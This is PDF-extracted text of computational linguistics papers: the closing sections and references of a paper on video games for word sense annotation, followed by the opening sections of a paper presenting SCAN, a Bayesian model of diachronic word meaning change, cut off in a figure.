Wordrobe Nouns Wordrobe Verbs Random Figure 4: Average WSD accuracy as a function of the number of games played for a context boom! annotations are recorded after three flights were seen in each game. Figure 4 shows the perfor- mance relative to the number of annotators for both Ka-boom! and Wordrobe, i.e., the number of games played for that context by different players. For nouns, Ka-boom! is able to exceed the MFS baseline after only two games are played. For both nouns and verbs, multiple rounds of Ka-boom! game play improve performance. In contrast to Ka- Boom!, Wordrobe accuracy declines as the number of players increases; when multiple players disagree on the sense, no clear majority emerges in Wor- drobe, lowering the accuracy of the resulting anno- tation. In contrast, a single player in Ka-boom! pro- duces multiple sense judgments for a context in a single game via interacting with each flight of im- ages. These interactions provide a robust distribu- tional annotation over senses that can be easily ag- gregated with other players’ judgments to produce a higher-quality single sense annotation. This analysis suggests that Ka-boom! can produce accurate anno- tations with just a few games per context, removing the need for many redundant annotations and im- proving the overall annotation throughput. 7 Conclusion and Future Work In this work we have presented a new model of lin- guistic Games with a Purpose focused on annota- tion using video games. Our contributions show that designing linguistic annotation tasks as video games can produce high-quality annotations. In the first game, Puzzle Racer, we demonstrated that game play can produce a high-quality library of images as- sociated with WordNet senses, equivalent to those produced by expert annotators. Moreover, Puzzle Racer reduces the cost of producing an equivalent resource via crowdsourcing by at least 73% while providing similar-quality image ratings. In the sec- ond game, Ka-boom!, we demonstrated that a video game could be used to perform accurate word sense annotation with a large improvement over the MFS baseline and a statistically significant improvement over current game-based WSD. While not all linguistic annotations tasks are eas- ily representable as video games, our two games provide an important starting point for building new types of NLP games with a purpose based on video games mechanics. Software for both games will be open-sourced, providing a new resource for future game development and extensions of our work. Fur- thermore, the multiple data sets produced by this work are available at http://lcl.uniroma1. it/videogames, providing (1) a sense-image mapping from hundreds of senses to tens of thou- sands of images, (2) word labels for most images in our dataset, (3) Web queries associated with all senses, and (4) image-based word sense annotations. Based on our results, three directions for future work are planned. The two games presented here focus on concepts that can be represented visually and thus lend themselves to annotations for lexi- cal semantics. However, the fact that the games are graphical does not prevent them from showing textual items (see Vannella et al. (2014)) and more apt video games could be developed for text-based annotations such as PP-attachment or pronoun res- olution. Therefore, in our first future work, we plan to develop new types of video games for tex- tual items as well as extend the current games for new semantic tasks such as selectional preferences and frame annotation. Second, we plan to scale up both games to a broader audience such as Face- book, creating a larger sense-image library and a standard platform for releasing video games with a purpose. Third, we plan to build multilingual games using the images from Puzzle Racer, which provide a language-independent concept representation, and could therefore be used to enable the annotation and validation of automatically-created knowledge re- sources (Hovy et al., 2013). 460 Acknowledgments The authors gratefully acknowl- edge the support of the ERC Start- ing Grant MultiJEDI No. 259234. We thank the many game players whose collective passion for video games made this work possible. References Guillaume Artignan, Mountaz Hascoët, and Mathieu Lafourcade. 2009. Multiscale visual analysis of lexi- cal networks. In Proceedings of the International Con- ference on Information Visualisation, pages 685–690. Ron Artstein and Massimo Poesio. 2008. Inter-coder agreement for computational linguistics. Computa- tional Linguistics, 34(4):555–596. Collin F. Baker, Charles J. Fillmore, and John B. Lowe. 1998. The Berkeley FrameNet project. In Pro- ceedings of the 17th International Conference on Computational Linguistics and 36th Annual Meet- ing of the Association for Computational Linguistics, Montréal, Québec, Canada, 10–14 August 1998, Mon- treal, Canada. Kobus Barnard, Pinar Duygulu, David Forsyth, Nando De Freitas, David M. Blei, and Michael I. Jordan. 2003. Matching words and pictures. The Journal of Machine Learning Research, 3:1107–1135. Chris Biemann and Valerie Nygaard. 2010. Crowdsourc- ing WordNet. In The 5th International Conference of the Global WordNet Association (GWC-2010). Jon Chamberlain, Karën Fort, Udo Kruschwitz, Math- ieu Lafourcade, and Massimo Poesio. 2013. Using games to create language resources: Successes and limitations of the approach. In Iryna Gurevych and Jungi Kim, editors, The People’s Web Meets NLP, The- ory and Applications of Natural Language Processing, pages 3–44. Springer. Tim Chklovski and Yolanda Gil. 2005. Improving the design of intelligent acquisition interfaces for collect- ing world knowledge from web contributors. In Pro- ceedings of the International Conference on Knowl- edge Capture, pages 35–42. ACM. Tim Chklovski and Rada Mihalcea. 2002. Building a Sense Tagged Corpus with Open Mind Word Expert. In Proceedings of ACL 2002 Workshop on WSD: Re- cent Successes and Future Directions, Philadelphia, PA, USA. Seth Cooper, Firas Khatib, Adrien Treuille, Janos Bar- bero, Jeehyung Lee, Michael Beenen, Andrew Leaver- Fay, David Baker, Zoran Popović, and Foldit players. 2010. Predicting protein structures with a multiplayer online game. Nature, 466(7307):756–760. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. 2009. ImageNet: A large-scale hier- archical image database. In Proceedings of the Con- ference on Computer Vision and Pattern Recognition (CVPR), pages 248–255. Philip Edmonds and Adam Kilgarriff. 2002. Introduc- tion to the special issue on evaluating word sense dis- ambiguation systems. Natural Language Engineering, 8(4):279–291. Katrin Erk and Diana McCarthy. 2009. Graded word sense assignment. In Proceedings of the 2009 Confer- ence on Empirical Methods in Natural Language Pro- cessing (EMNLP), pages 440–449, Singapore. Katrin Erk, Diana McCarthy, and Nicholas Gaylord. 2012. Measuring word meaning in context. Computa- tional Linguistics, 39(3):511–554. Christiane Fellbaum, Joachim Grabowski, and Shari Lan- des. 1998. Performance and confidence in a semantic annotation task. In Christiane Fellbaum, editor, Word- Net: An electronic lexical database, pages 217–237. MIT Press. Christiane Fellbaum, editor. 1998. WordNet: An Elec- tronic Database. MIT Press, Cambridge, MA. Yansong Feng and Mirella Lapata. 2013. Automatic caption generation for news images. IEEE Transac- tions on Pattern Analysis and Machine Intelligence, 35(4):797–812. Tiziano Flati and Roberto Navigli. 2013. SPred: Large- scale Harvesting of Semantic Predicates. In Proceed- ings of the 51st Annual Meeting of the Association for Computational Linguistics (ACL), pages 1222–1232, Sofia, Bulgaria. Amaç Herdağdelen and Marco Baroni. 2012. Bootstrap- ping a game with a purpose for common sense col- lection. ACM Transactions on Intelligent Systems and Technology, 3(4):1–24. Barbora Hladká, Jiřı́ Mı́rovskỳ, and Pavel Schlesinger. 2009. Play the language: Play coreference. In Pro- ceedings of the Joint Conference of the Association for Computational Linguistics and International Joint Conference of the Asian Federation of Natural Lan- guage Processing (ACL-IJCNLP), pages 209–212. As- sociation for Computational Linguistics. Jisup Hong and Collin F. Baker. 2011. How Good is the Crowd at “real” WSD? In Proceedings of the Fifth Linguistic Annotation Workshop (LAW V), pages 30– 37. ACL. Eduard H. Hovy, Roberto Navigli, and Simone Paolo Ponzetto. 2013. Collaboratively built semi-structured content and Artificial Intelligence: The story so far. Artificial Intelligence, 194:2–27. David Jurgens. 2013. Embracing ambiguity: A compar- ison of annotation methodologies for crowdsourcing 461 word sense labels. In Proceedings of the Conference of the North American Chapter of the Association of Computational Linguistics (NAACL), pages 556–562. Ramesh Krishnamurthy and Diane Nicholls. 2000. Peel- ing an onion: The lexicographer’s experience of man- ual sense-tagging. Computers and the Humanities, 34(1-2):85–97. Girish Kulkarni, Visruth Premraj, Vicente Ordonez, Sag- nik Dhar, Siming Li, Yejin Choi, Alexander C. Berg, and Tamara L. Berg. 2013. Babytalk: Understand- ing and generating simple image descriptions. IEEE Transactions on Pattern Analysis and Machine Intelli- gence, 35(12):2891–2903. Yen-ling Kuo, Jong-Chuan Lee, Kai-yang Chiang, Rex Wang, Edward Shen, Cheng-wei Chan, and Jane Yung-jen Hsu. 2009. Community-based game de- sign: experiments on social games for commonsense data collection. In Proceedings of the ACM SIGKDD Workshop on Human Computation, pages 15–22. Mathieu Lafourcade and Alain Joubert. 2010. Comput- ing trees of named word usages from a crowdsourced lexical network. In Proceedings of the International Multiconference on Computer Science and Informa- tion Technology (IMCSIT), pages 439–446, Wisla, Poland. Tak Yeon Lee, Casey Dugan, Werner Geyer, Tristan Ratchford, Jamie Rasmussen, N. Sadat Shami, and Stela Lupushor. 2013. Experiments on motivational feedback for crowdsourced workers. In Seventh In- ternational AAAI Conference on Weblogs and Social Media (ICWSM), pages 341–350. Thomas Mensink, Jakob J. Verbeek, and Gabriela Csurka. 2013. Tree-structured crf models for inter- active image labeling. IEEE Transactions on Pattern Analysis and Machine Intelligence, 35(2):476–489. George A. Miller, Claudia Leacock, Randee Tengi, and Ross Bunker. 1993. A semantic concordance. In Pro- ceedings of the 3rd DARPA Workshop on Human Lan- guage Technology, pages 303–308, Plainsboro, N.J. Roberto Navigli and Simone Paolo Ponzetto. 2012. Ba- belNet: The automatic construction, evaluation and application of a wide-coverage multilingual semantic network. Artificial Intelligence, 193:217–250. Roberto Navigli. 2009. Word Sense Disambiguation: A survey. ACM Computing Surveys (CSUR), 41(2):1–69. Martha Palmer, Hoa Dang, and Christiane Fellbaum. 2007. Making fine-grained and coarse-grained sense distinctions, both manually and automatically. Natu- ral Language Engineering, 13(2):137–163. Rebecca J. Passonneau and Bob Carpenter. 2013. The benefits of a model of annotation. In 7th Linguistic Annotation Workshop and Interoperability with Dis- course, August 8–9. Rebecca J. Passonneau, Vikas Bhardwaj, Ansaf Salleb- Aouissi, and Nancy Ide. 2012. Multiplicity and word sense: evaluating and learning from multiply labeled word sense annotations. Language Resources and Evaluation, 46(2):209–252. Ei Pa Pa Pe-Than, DH-L Goh, and Chei Sian Lee. 2012. A survey and typology of human computation games. In Information Technology: New Generations (ITNG), 2012 Ninth International Conference on, pages 720– 725. IEEE. Mohammad Taher Pilehvar and Roberto Navigli. 2014. A Large-scale Pseudoword-based Evaluation Frame- work for State-of-the-Art Word Sense Disambigua- tion. Computational Linguistics, 40(4). Massimo Poesio, Jon Chamberlain, Udo Kruschwitz, Livio Robaldo, and Luca Ducceschi. 2013. Phrase de- tectives: Utilizing collective intelligence for internet- scale language resource creation. ACM Transac- tions on Interactive Intelligent Systems, 3(1):3:1–3:44, April. Nitin Seemakurty, Jonathan Chu, Luis Von Ahn, and An- thony Tomasic. 2010. Word sense disambiguation via human computation. In Proceedings of the ACM SIGKDD Workshop on Human Computation, pages 60–63. ACM. Rion Snow, Brendan O’Connor, Daniel Jurafsky, and Andrew Ng. 2008. Cheap and fast – but is it good? evaluating non-expert annotations for natural language tasks. In Proceedings of the 2008 Confer- ence on Empirical Methods in Natural Language Pro- cessing, Waikiki, Honolulu, Hawaii, 25-27 October, pages 254–263. Antonio Torralba, Robert Fergus, and William T Free- man. 2008. 80 million tiny images: A large data set for nonparametric object and scene recognition. IEEE Transactions on Pattern Analysis and Machine Intelli- gence, 30(11):1958–1970. Daniele Vannella, David Jurgens, Daniele Scarfini, Domenico Toscani, and Roberto Navigli. 2014. Vali- dating and extending semantic knowledge bases using video games with a purpose. In Proceedings of the 52nd Annual Meeting of the Association for Computa- tional Linguistics (ACL), pages 1294–1304. Noortje J. Venhuizen, Valerio Basile, Kilian Evang, and Johan Bos. 2013. Gamification for word sense label- ing. In Proceedings of the International Conference on Computational Semantics (IWCS), pages 397–403. Luis von Ahn and Laura Dabbish. 2004. Labeling im- ages with a computer game. In Proceedings of the Conference on Human Factors in Computing Systems (CHI), pages 319–326. Luis von Ahn and Laura Dabbish. 2008. Designing games with a purpose. Communications of the ACM, 51(8):58–67. 462 Aobo Wang, Cong Duy Vu Hoang, and Min-Yen Kan. 2013. Perspectives on crowdsourcing annotations for natural language processing. Language Resources and Evaluation, 47(1):9–31. 463 464 work_e7wzf6nye5ekvb5ddmyh7khavi ---- Edinburgh Research Explorer A Bayesian Model of Diachronic Meaning Change Citation for published version: Frermann, L & Lapata, M 2016, 'A Bayesian Model of Diachronic Meaning Change', Transactions of the Association for Computational Linguistics, vol. 4, pp. 31-45. <https://transacl.org/ojs/index.php/tacl/article/view/796> Link: Link to publication record in Edinburgh Research Explorer Document Version: Publisher's PDF, also known as Version of record Published In: Transactions of the Association for Computational Linguistics General rights Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. Take down policy The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. Download date: 06. Apr. 2021 https://transacl.org/ojs/index.php/tacl/article/view/796 https://www.research.ed.ac.uk/portal/en/publications/a-bayesian-model-of-diachronic-meaning-change(d4f70944-eee3-4e68-88bc-477b1b11d1ef).html A Bayesian Model of Diachronic Meaning Change Lea Frermann and Mirella Lapata Institute for Language, Cognition and Computation School of Informatics, University of Edinburgh 10 Crichton Street, Edinburgh EH8 9AB l.frermann@ed.ac.uk, mlap@inf.ed.ac.uk Abstract Word meanings change over time and an au- tomated procedure for extracting this infor- mation from text would be useful for histor- ical exploratory studies, information retrieval or question answering. We present a dy- namic Bayesian model of diachronic meaning change, which infers temporal word represen- tations as a set of senses and their prevalence. Unlike previous work, we explicitly model language change as a smooth, gradual pro- cess. We experimentally show that this model- ing decision is beneficial: our model performs competitively on meaning change detection tasks whilst inducing discernible word senses and their development over time. Application of our model to the SemEval-2015 temporal classification benchmark datasets further re- veals that it performs on par with highly op- timized task-specific systems. 1 Introduction Language is a dynamic system, constantly evolv- ing and adapting to the needs of its users and their environment (Aitchison, 2001). Words in all lan- guages naturally exhibit a range of senses whose dis- tribution or prevalence varies according to the genre and register of the discourse as well as its historical context. As an example, consider the word cute which according to the Oxford English Dictionary (OED, Stevenson 2010) first appeared in the early 18th century and originally meant clever or keen- witted.1 By the late 19th century cute was used in 1Throughout this paper we denote words in true type, their senses in italics, and sense-specific context words as {lists}. the same sense as cunning. Today it mostly refers to objects or people perceived as attractive, pretty or sweet. Another example is the word mouse which initially was only used in the rodent sense. The OED dates the computer pointing device sense of mouse to 1965. The latter sense has become par- ticularly dominant in recent decades due to the ever- increasing use of computer technology. The arrival of large-scale collections of historic texts (Davies, 2010) and online libraries such as the Internet Archive and Google Books have greatly facilitated computational investigations of language change. The ability to automatically detect how the meaning of words evolves over time is potentially of significant value to lexicographic and linguistic research but also to real world applications. Time- specific knowledge would presumably render word meaning representations more accurate, and benefit several downstream tasks where semantic informa- tion is crucial. Examples include information re- trieval and question answering, where time-related information could increase the precision of query disambiguation and document retrieval (e.g., by re- turning documents with newly created senses or fil- tering out documents with obsolete senses). In this paper we present a dynamic Bayesian model of diachronic meaning change. Word mean- ing is modeled as a set of senses, which are tracked over a sequence of contiguous time intervals. We infer temporal meaning representations, consisting of a word’s senses (as a probability distribution over words) and their relative prevalence. Our model is thus able to detect that mouse had one sense until the mid-20th century (characterized by words such as {cheese, tail, rat}) and subsequently acquired a 31 Transactions of the Association for Computational Linguistics, vol. 4, pp. 31–45, 2016. Action Editor: Tim Baldwin. Submission batch: 12/2015; Revision batch: 2/2016; Published 2/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. second sense relating to computer device. More- over, it infers subtle changes within a single sense. For instance, in the 1970s the words {cable, ball, mousepad} were typical for the computer device sense, whereas nowadays the terms {optical, laser, usb} are more typical. Contrary to previous work (Mitra et al., 2014; Mihalcea and Nastase, 2012; Gu- lordava and Baroni, 2011) where temporal represen- tations are learnt in isolation, our model assumes that adjacent representations are co-dependent, thus capturing the nature of meaning change being fun- damentally smooth and gradual (McMahon, 1994). This also serves as a form of smoothing: temporally neighboring representations influence each other if the available data is sparse. Experimental evaluation shows that our model (a) induces temporal representations which reflect word senses and their development over time, (b) is able to detect meaning change between two time pe- riods, and (c) is expressive enough to obtain useful features for identifying the time interval in which a piece of text was written. Overall, our results indi- cate that an explicit model of temporal dynamics is advantageous for tracking meaning change. Com- parisons across evaluations and against a variety of related systems show that despite not being designed with any particular task in mind, our model performs competitively across the board. 2 Related Work Most work on diachronic language change has fo- cused on detecting whether and to what extent a word’s meaning changed (e.g., between two epochs) without identifying word senses and how these vary over time. A variety of methods have been applied to the task ranging from the use of statistical tests in order to detect significant changes in the distribution of terms from two time periods (Popescu and Strap- parava, 2013; Cook and Stevenson, 2010), to train- ing distributional similarity models on time slices (Gulordava and Baroni, 2011; Sagi et al., 2009), and neural language models (Kim et al., 2014; Kulkarni et al., 2015). Other work (Mihalcea and Nastase, 2012) takes a supervised learning approach and pre- dicts the time period to which a word belongs given its surrounding context. Bayesian models have been previously developed for various tasks in lexical semantics (Brody and La- pata, 2009; Ó Séaghdha, 2010; Ritter et al., 2010) and word meaning change detection is no exception. Using techniques from non-parametric topic model- ing, Lau et al. (2012) induce word senses (aka. top- ics) for a given target word over two time periods. Novel senses are then are detected based on the discrepancy between sense distributions in the two periods. Follow-up work (Cook et al., 2014; Lau et al., 2014) further explores methods for how to best measure this sense discrepancy. Rather than infer- ring word senses, Wijaya and Yeniterzi (2011) use a Topics-over-Time model and k-means clustering to identify the periods during which selected words move from one topic to another. A non-Bayesian approach is put forward in Mi- tra et al. (2014, 2015) who adopt a graph-based framework for representing word meaning (see Tah- masebi et al. (2011) for a similar earlier proposal). In this model words correspond to nodes in a se- mantic network and edges are drawn between words sharing contextual features (extracted from a depen- dency parser). A graph is constructed for each time interval, and nodes are clustered into senses with Chinese Whispers (Biemann, 2006), a randomized graph clustering algorithm. By comparing the in- duced senses for each time slice and observing inter- cluster differences, their method can detect whether senses emerge or disappear. Our work draws ideas from dynamic topic mod- eling (Blei and Lafferty, 2006b) where the evolu- tion of topics is modeled via (smooth) changes in their associated distributions over the vocabulary. Although the dynamic component of our model is closely related to previous work in this area (Mimno et al., 2008), our model is specifically constructed for capturing sense rather than topic change. Our ap- proach is conceptually similar to Lau et al. (2012). We also learn a joint sense representation for multi- ple time slices. However, in our case the number of time slices in not restricted to two and we explicitly model temporal dynamics. Like Mitra et al. (2014, 2015), we model how senses change over time. In our model, temporal representations are not inde- pendent, but influenced by their temporal neighbors, encouraging smooth change over time. We therefore induce a global and consistent set of temporal repre- sentations for each word. Our model is knowledge- lean (it does not make use of a parser) and language 32 independent (all that is needed is a time-stamped corpus and tools for basic pre-processing). Contrary to Mitra et al. (2014, 2015), we do not treat the tasks of inferring a semantic representation for words and their senses as two separate processes. Evaluation of models which detect meaning change is fraught with difficulties. There is no stan- dard set of words which have undergone meaning change or benchmark corpus which represents a va- riety of time intervals and genres, and is thematically consistent. Previous work has generally focused on a few hand-selected words and models were evalu- ated qualitatively by inspecting their output, or the extent to which they can detect meaning changes from two time periods. For example, Cook et al. (2014) manually identify 13 target words which un- dergo meaning change in a focus corpus with re- spect to a reference corpus (both news text). They then assess how their models fare at learning sense differences for these targets compared to distractors which did not undergo meaning change. They also underline the importance of using thematically com- parable reference and focus corpora to avoid spuri- ous differences in word representations. In this work we evaluate our model’s ability to detect and quantify meaning change across several time intervals (not just two). Instead of relying on a few hand-selected target words, we use larger sets sampled from our learning corpus or found to undergo meaning change in a judgment elicitation study (Gulordava and Baroni, 2011). In addition, we adopt the evaluation paradigm of Mitra et al. (2014) and validate our findings against WordNet. Finally, we apply our model to the recently es- tablished SemEval-2015 diachronic text evaluation subtasks (Popescu and Strapparava, 2015). In order to present a consistent set of experiments, we use our own corpus throughout which covers a wider range of time intervals and is compiled from a variety of genres and sources and is thus thematically coher- ent (see Section 4 for details). Wherever possible, we compare against prior art, with the caveat that the use of a different underlying corpus unavoidably influences the obtained semantic representations. 3 A Bayesian Model of Sense Change In this section we introduce SCAN, our dynamic Bayesian model of Sense ChANge. SCAN captures how a word’s senses evolve over time (e.g., whether new senses emerge), whether some senses become more or less prevalent, as well as phenomena per- taining to individual senses such as meaning exten- sion, shift, or modification. We assume that time is discrete, divided into contiguous intervals. Given a word, our model infers its senses for each time in- terval and their probability. It captures the gradual nature of meaning change explicitly, through depen- dencies between temporally adjacent meaning rep- resentations. Senses themselves are expressed as a probability distribution over words, which can also change over time. 3.1 Model Description We create a SCAN model for each target word c. The input to the model is a corpus of short text snippets, each consisting of a mention of the target word c and its local context w (in our experiments this is a sym- metric context window of ±5 words). Each snip- pet is annotated with its year of origin. The model is parametrized with regard to the number of senses k ∈ [1...K] of the target word c, and the length of time intervals ∆T which might be finely or coarsely defined (e.g., spanning a year or a decade). We conflate all documents originating from the same time interval t ∈ [1...T] and infer a tempo- ral representation of the target word per interval. A temporal meaning representation for time t is (a) a K-dimensional multinomial distribution over word senses φt and (b) a V -dimensional distribution over the vocabulary ψt,k for each word sense k. In ad- dition, our model infers a precision parameter κφ, which controls the extent to which sense prevalence changes for word c over time (see Section 3.2 for details on how we model temporal dynamics). We place individual logistic normal priors (Blei and Lafferty, 2006a) on our multinomial sense dis- tributions φ and sense-word distributions ψk. A draw from the logistic normal distribution con- sists of (a) a draw of an n-dimensional random vector x from the multivariate normal distribution parametrized by an n-dimensional mean vector µ and a n × n variance-covariance matrix Σ, x ∼ N(x|µ, Σ); and (b) a mapping of the drawn param- eters to the simplex through the logistic transforma- tion φn = exp(xn)/ ∑ n′ exp(xn′ ), which ensures a draw of valid multinomial parameters. The normal distributions are parametrized to encourage smooth 33 wz z w z w φt−1 φt φt+1 κφa,b ψt−1 ψt ψt+1 κψ I Dt−1 I Dt I Dt+1 K Draw κφ ∼ Gamma(a,b) for time interval t = 1..T do Draw sense distribution φt|φ−t,κφ ∼N( 1 2 (φt−1 + φt+1),κφ) for sense k = 1..K do Draw word distribution ψt,k|ψ−t,κψ ∼N( 1 2 (ψt−1,k+ψt+1,k),κψ) for document d = 1..D do Draw sense zd ∼ Mult(φt) for context position i = 1..I do Draw word wd,i ∼ Mult(ψt,zd ) Figure 1: Left: plate diagram for the dynamic sense model for three time steps {t−1, t, t+1}. Constant parameters are shown as dashed nodes, latent variables as clear nodes, and observed variables as gray nodes. Right: the corresponding generative story. change in multinomial parameters, over time (see Section 3.2 for details), and the extent of change is controlled through a precision parameter κ. We learn the value of κφ during inference, which al- lows us to model the extent of temporal change in sense prevalence individually for each target word. We draw κφ from a conjugate Gamma prior. We do not infer the sense-word precision parameter κψ on all ψk. Instead, we fix it at a high value, trig- gering little variation of word distributions within senses. This leads to senses being thematically co- herent over time. We now describe the generative story of our model, which is depicted in Figure 1 (right), along- side its plate diagram representation (left). First, we draw the sense precision parameter κφ from a Gamma prior. For each time interval t we draw (a) a multinomial distribution over senses φt from a lo- gistic normal prior; and (b) a multinomial distribu- tion over the vocabulary ψt,k for each sense k, from another logistic normal prior. Next, we generate time-specific text snippets. For each snippet d, we first observe the time interval t, and draw a sense zd from Mult(φt). Finally, we generate I context words wd,i independently from Mult(ψt,z d ). 3.2 Background on iGMRFs Let φ = {φ1...φT} denote a T-dimensional random vector, where each φt might for example correspond to a sense probability at time t. We define a prior which encourages smooth change of parameters at neighboring times, in terms of a first order random walk on the line (graphically shown in Figure 2, and the chains of φ and ψ in Figure 1(left)). Specifically, we define this prior as an intrinsic Gaussian Markov Random Field (iGMRF; Rue and Held 2005), which allows us to model the change of adjacent parame- ters as drawn from a normal distribution, e.g.: ∆φt ∼N(0,κ−1). (1) The iGMRF is defined with respect to the graph in Figure 2; it is sparsely connected with only first- order dependencies which allows for efficient in- ference. A second feature, which makes iGMRFs popular as priors in Bayesian modeling, is the fact that they can be defined purely in terms of the lo- cal changes between dependent (i.e., adjacent) vari- ables, without the need to specify an overall mean of the model. The full conditionals explicitly cap- ture these intuitions: φt|φ−t,κ ∼N (1 2 (φt−1 + φt+1), 1 2κ ) , (2) for 1 < t < T , where φ−t is the vector φ ex- cept element φt and κ is a precision parameter. The value of parameter φt is distributed normally, cen- tered around the mean of the values of its neighbors, without reference to a global mean. The precision parameter κ controls the extent of variation: how tightly coupled are the neighboring parameters? Or, 34 φ1 φt−1 φt φt+1 φT Figure 2: A linear chain iGMRF. in our case: how tightly coupled are temporally ad- jacent meaning representations of a word c? We es- timate the precision parameter κφ during inference. This allows us to flexibly capture sense variation over time individually for each target word. For a detailed introduction to (i)GMRFs we refer the interested reader to Rue and Held (2005). For an application of iGMRFs to topic models see Mimno et al. (2008). 3.3 Inference We use a blocked Gibbs sampler for approximate in- ference. The logistic normal prior is not conjugate to the multinomial distribution. This means that the straightforward parameter updates known for sam- pling standard, Dirichlet-multinomial, topic models do not apply. However, sampling-based methods for logistic normal topic models have been proposed in the literature (Mimno et al., 2008; Chen et al., 2013). At each iteration, we sample: (a) document- sense assignments, (b) multinomial parameters from the logistic normal prior, and (c) the sense preci- sion parameter from a Gamma prior. Our blocked sampler first iterates over all input text snippets d with context w, and re-samples their sense assign- ments under the current model parameters {φ}T and {ψ}K×T , p(zd|w, t,φ,ψ) ∝ p ( zd|t ) p ( w|t,zd ) = φt zd ∏ w∈w ψt,z d w (3) Next, we re-sample parameters {φ}T and {ψ}K×T from the logistic normal prior, given the current sense assignments. We use the auxiliary variable method proposed in Mimno et al. (2008) (see also Groenewald and Mokgatlhe (2005)). Intuitively, each individual parameter (e.g., sense k’s prevalence at time t, φtk) is ‘shifted’ within a weighted region which is bounded by the number of times sense k was observed at time t. The weights of the region are determined by the prior, in our case the normal distributions defined by the iGMRF, which ensure Corpus years covered #words COHA 1810–2009 142,587,656 DTE 1700–2010 124,771 CLMET3.0 1710–1810 4,531,505 Table 1: Size and coverage of our three training corpora (after pre-processing). an influence of temporal neighbors φt−1k and φ t+1 k on the new parameter value φtk, and smooth tempo- ral variation as desired. The same procedure applies to each word parameter under each {time, sense} ψ t,k w (see Mimno et al. 2008 for a more detailed de- scription of the sampler). Finally, we periodically re-sample the sense precision parameter κφ from its conjugate Gamma prior. 4 The DATE Corpus Before presenting our evaluation we describe the corpus used as a basis for the experiments per- formed in this work. We applied our model to a DiAchronic TExt corpus (DATE) which collates documents spanning years 1700–2010 from three sources: (a) the COHA corpus2 (Davies, 2010), a large collection of texts from various genres cover- ing the years 1810–2010; (b) the training data pro- vided by the DTE task3 organizers (see Section 8); and (c) the portion of the CLMET3.04 corpus (Diller et al., 2011) corresponding to the period 1710–1810 (which is not covered by the COHA corpus and thus underrepresented in our training data). CLMET3.0 contains texts representative of a range of genres in- cluding narrative fiction, drama, letters, and was col- lected from various online archives. Table 1 pro- vides details on the size of our corpus. Documents were clustered by their year of pub- lication as indicated in the original corpora. In the CLMET3.0 corpus, occasionally a range of years would be provided. In this case we used the fi- nal year of the range. We tokenized, lemmatized, and part of speech tagged DATE using the NLTK (Bird et al., 2009). We removed stopwords and func- tion words. After preprocessing, we extracted target 2http://corpus.byu.edu/coha/ 3http://alt.qcri.org/semeval2015/task7/ index.php?id=data-and-tools 4http://www.kuleuven.be/˜u0044428/ clmet3_0.htm 35 http://corpus.byu.edu/coha/ http://alt.qcri.org/semeval2015/task7/index.php?id=data-and-tools http://alt.qcri.org/semeval2015/task7/index.php?id=data-and-tools http://www.kuleuven.be/~u0044428/clmet3_0.htm http://www.kuleuven.be/~u0044428/clmet3_0.htm word-specific input corpora for our models. These consisted of mentions of a target c and its surround- ing context, a symmetric window of ± 5 words. 5 Experiment 1: Temporal Dynamics As discussed earlier our model departs from previ- ous approaches (e.g., Mitra et al. 2014) in that it learns globally consistent temporal representations for each word. In order to assess whether temporal dependencies are indeed beneficial, we implemented a stripped-down version of our model (SCAN-NOT) which does not have any temporal dependencies be- tween individual time steps (i.e., without the chain iGMRF priors). Word meaning is still represented as senses and sense prevalence is modeled as a dis- tribution over senses for each time interval. How- ever, time intervals are now independent. Inference works as described in Section 3.3, without having to learn the κ precision parameters. Models and Parameters We compared the two models in terms of their predictive power. We split the DATE corpus into a training period {d1...dt} of time slices 1 through t and computed the like- lihood p(dt+1|φt,ψt) of the data at test time slice t + 1, under the parameters inferred for the previous time slice. The time slice size was set to ∆T = 20 years. We set the number of senses to K = 8, the word precision parameter κψ = 10, a high value which enforces individual senses to re- main thematically consistent across time. We set the initial sense precision parameter κφ = 4, and the Gamma parameters a = 7 and b = 3. These pa- rameters were optimized once on the development data used for the task-based evaluation discussed in Section 8. Unless otherwise specified all ex- periments use these values. No parameters were tuned on the test set for any task. In all exper- iments we ran the Gibbs sampler for 1,000 itera- tions, and resampled κφ after every 50 iterations, starting from iteration 150. We used the final state of the sampler throughout. We randomly selected 50 mid-frequency target concepts from a larger set of target concepts described in Section 8. Predictive loglikelihood scores were averaged across concepts and were calculated as the average under 10 param- eter samples {φt,ψt} from the trained models. 1920-39 1940-59 1960-79 1980-99 −1,7 −1,65 ·105 predicted time period lo gl ik el ih oo d SCAN SCAN-NOT Figure 3: Predictive log likelihood of SCAN and a ver- sion without temporal dependencies (SCAN-NOT) across various test time periods. Results Figure 3 displays predictive loglikelihood scores for four test time intervals. SCAN outper- forms its stripped-down version throughout (higher is better). Since the representations learnt by SCAN are influenced (or smoothed) by neighboring repre- sentations, they overfit specific time intervals less which leads to better predictive performance. Fig- ure 4 further shows how SCAN models meaning change for the words band, power, transport and bank. The sense distributions over time are shown as a sequence of stacked histograms, senses themselves are color-coded (and enumerated) below, in the same order as in the histograms. Each sense k is illustrated as the 10 words w assigned the highest posterior probability, marginalizing over the time- specific representations p(w|k) = ∑ t ψ t,k w . Words representative of prevalent senses are highlighted in bold face. Figure 4 (top left) demonstrates that the model is able to capture various senses of the word band, such as strip used for binding (yellow bars/number 3 in the figure) or musical band (grey/1, orange/7). Our model predicts an increase in prevalence over the modeled time period for both senses. This is cor- roborated by the OED which provides the majority of references for the binding strip sense for the 20th century and dates the musical band sense to 1812. In addition a social band sense (violet/6, darkgreen/8; in the sense of bonding) emerges, which is present across time slices. The sense colored brown/2 refers to the British Band, a group of native Americans involved in the Black Hawk War in 1832, and the model indeed indicates a prevalence of this sense around this time (see bars 1800–1840 in the figure). For the word power (Figure 4 (top right)), 36 1700 1720 1740 1760 1780 1800 1820 1840 1860 1880 1900 1920 1940 1960 1980 2000 band 8 band play people time little call father day love boy 7 play band music time country day march military frequency jazz 6 little hand play land love time night speak strong name 5 little soldier leader time land arm hand country war indian 4 music play dance band hear time little evening stand house 3 black white hat broad gold wear hair band head rubber 2 indian little day horse time people meet chief leave war 1 play music hand hear sound march street air look strike 1700 1720 1740 1760 1780 1800 1820 1840 1860 1880 1900 1920 1940 1960 1980 2000 